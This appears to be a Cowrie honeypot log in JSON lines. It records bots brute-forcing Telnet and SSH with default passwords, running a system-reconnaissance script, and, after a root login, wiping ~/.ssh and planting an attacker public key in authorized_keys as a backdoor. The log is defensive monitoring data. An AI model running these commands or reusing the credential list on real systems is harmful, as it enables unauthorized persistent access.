{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T06:34:06.231927Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T06:34:06.232695Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T06:34:06.233788Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T06:34:06.235330Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T06:34:06.236250Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T06:34:06.237049Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T06:34:06.238799Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T06:34:06.239382Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T06:34:06.240173Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T06:34:06.240799Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T06:34:06.241632Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T06:34:06.242077Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T06:34:06.402624Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:06.403857Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:06.405654Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32809,"dst_ip":"1.2.3.4","dst_port":23,"session":"889f62295293","protocol":"telnet","message":"New connection: 212.227.235.229:32809 (1.2.3.4:23) [session: 889f62295293]","sensor":"my-vps","timestamp":"2025-08-31T06:34:07.346847Z"}
{"eventid":"cowrie.session.closed","duration":1.736891269683838,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:07.369374Z","src_ip":"212.227.125.160","session":"ab9e0db40d9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45316,"dst_ip":"1.2.3.4","dst_port":23,"session":"7517dbcf74f2","protocol":"telnet","message":"New connection: 212.227.125.160:45316 (1.2.3.4:23) [session: 7517dbcf74f2]","sensor":"my-vps","timestamp":"2025-08-31T06:34:07.466077Z"}
{"eventid":"cowrie.login.failed","username":"rabbitmq","password":"rabbitmq","message":"login attempt [rabbitmq/rabbitmq] failed","sensor":"my-vps","timestamp":"2025-08-31T06:34:08.686133Z","src_ip":"212.227.235.229","session":"8678f4f8c0c4"}
{"eventid":"cowrie.session.closed","duration":1.3250060081481934,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:08.790987Z","src_ip":"212.227.125.160","session":"7517dbcf74f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45318,"dst_ip":"1.2.3.4","dst_port":23,"session":"70d3f10f1895","protocol":"telnet","message":"New connection: 212.227.125.160:45318 (1.2.3.4:23) [session: 70d3f10f1895]","sensor":"my-vps","timestamp":"2025-08-31T06:34:08.887846Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T06:34:10.513546Z","src_ip":"212.227.125.160","session":"70d3f10f1895"}
{"eventid":"cowrie.session.closed","duration":3.783419609069824,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:12.671200Z","src_ip":"212.227.125.160","session":"70d3f10f1895"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45326,"dst_ip":"1.2.3.4","dst_port":23,"session":"5eb44b9af5e4","protocol":"telnet","message":"New connection: 212.227.125.160:45326 (1.2.3.4:23) [session: 5eb44b9af5e4]","sensor":"my-vps","timestamp":"2025-08-31T06:34:12.768732Z"}
{"eventid":"cowrie.session.closed","duration":"30.0","message":"Connection lost after 30.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:13.218818Z","src_ip":"212.227.235.229","session":"8678f4f8c0c4"}
{"eventid":"cowrie.session.closed","duration":1.3330354690551758,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:14.101701Z","src_ip":"212.227.125.160","session":"5eb44b9af5e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45338,"dst_ip":"1.2.3.4","dst_port":23,"session":"cfda97406778","protocol":"telnet","message":"New connection: 212.227.125.160:45338 (1.2.3.4:23) [session: cfda97406778]","sensor":"my-vps","timestamp":"2025-08-31T06:34:14.198915Z"}
{"eventid":"cowrie.session.closed","duration":1.6000394821166992,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:15.798882Z","src_ip":"212.227.125.160","session":"cfda97406778"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34686,"dst_ip":"1.2.3.4","dst_port":23,"session":"1befaedf0a57","protocol":"telnet","message":"New connection: 212.227.125.160:34686 (1.2.3.4:23) [session: 1befaedf0a57]","sensor":"my-vps","timestamp":"2025-08-31T06:34:15.895972Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60574,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f483f71213d","protocol":"ssh","message":"New connection: 212.227.125.160:60574 (1.2.3.4:22) [session: 1f483f71213d]","sensor":"my-vps","timestamp":"2025-08-31T06:34:16.436916Z"}
{"eventid":"cowrie.session.closed","duration":1.7870047092437744,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:17.682902Z","src_ip":"212.227.125.160","session":"1befaedf0a57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34688,"dst_ip":"1.2.3.4","dst_port":23,"session":"3aae2ac17b9f","protocol":"telnet","message":"New connection: 212.227.125.160:34688 (1.2.3.4:23) [session: 3aae2ac17b9f]","sensor":"my-vps","timestamp":"2025-08-31T06:34:17.780028Z"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-31T06:34:18.829629Z","src_ip":"212.227.125.160","session":"3aae2ac17b9f"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T06:34:20.161517Z","src_ip":"212.227.125.160","session":"3aae2ac17b9f"}
{"eventid":"cowrie.session.closed","duration":13.545170545578003,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:20.891944Z","src_ip":"212.227.235.229","session":"889f62295293"}
{"eventid":"cowrie.session.closed","duration":3.545036792755127,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:21.325006Z","src_ip":"212.227.125.160","session":"3aae2ac17b9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34690,"dst_ip":"1.2.3.4","dst_port":23,"session":"52eb2fc8812b","protocol":"telnet","message":"New connection: 212.227.125.160:34690 (1.2.3.4:23) [session: 52eb2fc8812b]","sensor":"my-vps","timestamp":"2025-08-31T06:34:21.422978Z"}
{"eventid":"cowrie.session.closed","duration":1.067821741104126,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:22.490726Z","src_ip":"212.227.125.160","session":"52eb2fc8812b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34706,"dst_ip":"1.2.3.4","dst_port":23,"session":"e64ccdfa77c5","protocol":"telnet","message":"New connection: 212.227.125.160:34706 (1.2.3.4:23) [session: e64ccdfa77c5]","sensor":"my-vps","timestamp":"2025-08-31T06:34:22.587693Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:34:23.278254Z","src_ip":"212.227.125.160","session":"1f483f71213d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:34:23.279495Z","src_ip":"212.227.125.160","session":"1f483f71213d"}
{"eventid":"cowrie.session.closed","duration":1.6500160694122314,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:24.237645Z","src_ip":"212.227.125.160","session":"e64ccdfa77c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34712,"dst_ip":"1.2.3.4","dst_port":23,"session":"c83638de2bbe","protocol":"telnet","message":"New connection: 212.227.125.160:34712 (1.2.3.4:23) [session: c83638de2bbe]","sensor":"my-vps","timestamp":"2025-08-31T06:34:24.332337Z"}
{"eventid":"cowrie.session.closed","duration":1.9223413467407227,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:26.254605Z","src_ip":"212.227.125.160","session":"c83638de2bbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41048,"dst_ip":"1.2.3.4","dst_port":23,"session":"e5e0eba9842e","protocol":"telnet","message":"New connection: 212.227.125.160:41048 (1.2.3.4:23) [session: e5e0eba9842e]","sensor":"my-vps","timestamp":"2025-08-31T06:34:26.350134Z"}
{"eventid":"cowrie.login.failed","username":"service","password":"service","message":"login attempt [service/service] failed","sensor":"my-vps","timestamp":"2025-08-31T06:34:27.440824Z","src_ip":"212.227.125.160","session":"e5e0eba9842e"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T06:34:28.850704Z","src_ip":"212.227.125.160","session":"e5e0eba9842e"}
{"eventid":"cowrie.session.closed","duration":3.120161294937134,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:29.470189Z","src_ip":"212.227.125.160","session":"e5e0eba9842e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41052,"dst_ip":"1.2.3.4","dst_port":23,"session":"bcc3dd76bfa6","protocol":"telnet","message":"New connection: 212.227.125.160:41052 (1.2.3.4:23) [session: bcc3dd76bfa6]","sensor":"my-vps","timestamp":"2025-08-31T06:34:29.567060Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32946,"dst_ip":"1.2.3.4","dst_port":22,"session":"23737c875475","protocol":"ssh","message":"New connection: 212.227.235.229:32946 (1.2.3.4:22) [session: 23737c875475]","sensor":"my-vps","timestamp":"2025-08-31T06:34:29.806004Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57564,"dst_ip":"1.2.3.4","dst_port":22,"session":"589f345cdb25","protocol":"ssh","message":"New connection: 212.227.235.229:57564 (1.2.3.4:22) [session: 589f345cdb25]","sensor":"my-vps","timestamp":"2025-08-31T06:34:30.135911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:34:30.137897Z","src_ip":"212.227.235.229","session":"589f345cdb25"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:34:30.414529Z","src_ip":"212.227.235.229","session":"589f345cdb25"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:34:30.615915Z","src_ip":"212.227.235.229","session":"23737c875475"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:34:30.616908Z","src_ip":"212.227.235.229","session":"23737c875475"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:34:31.560837Z","src_ip":"212.227.235.229","session":"589f345cdb25"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:34:32.135653Z","src_ip":"212.227.235.229","session":"589f345cdb25"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:34:32.136457Z","src_ip":"212.227.235.229","session":"589f345cdb25"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:34:32.137384Z","src_ip":"212.227.235.229","session":"589f345cdb25"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:32.415471Z","src_ip":"212.227.235.229","session":"589f345cdb25"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:34:33.041361Z","src_ip":"212.227.235.229","session":"589f345cdb25"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:34:33.042348Z","src_ip":"212.227.235.229","session":"589f345cdb25"}
{"eventid":"cowrie.login.failed","username":"tech","password":"tech","message":"login attempt [tech/tech] failed","sensor":"my-vps","timestamp":"2025-08-31T06:34:33.173396Z","src_ip":"212.227.125.160","session":"bcc3dd76bfa6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:34:33.323176Z","src_ip":"212.227.235.229","session":"589f345cdb25"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:33.324353Z","src_ip":"212.227.235.229","session":"589f345cdb25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58778,"dst_ip":"1.2.3.4","dst_port":22,"session":"49f51ec02375","protocol":"ssh","message":"New connection: 212.227.235.229:58778 (1.2.3.4:22) [session: 49f51ec02375]","sensor":"my-vps","timestamp":"2025-08-31T06:34:33.670910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:34:33.671846Z","src_ip":"212.227.235.229","session":"49f51ec02375"}
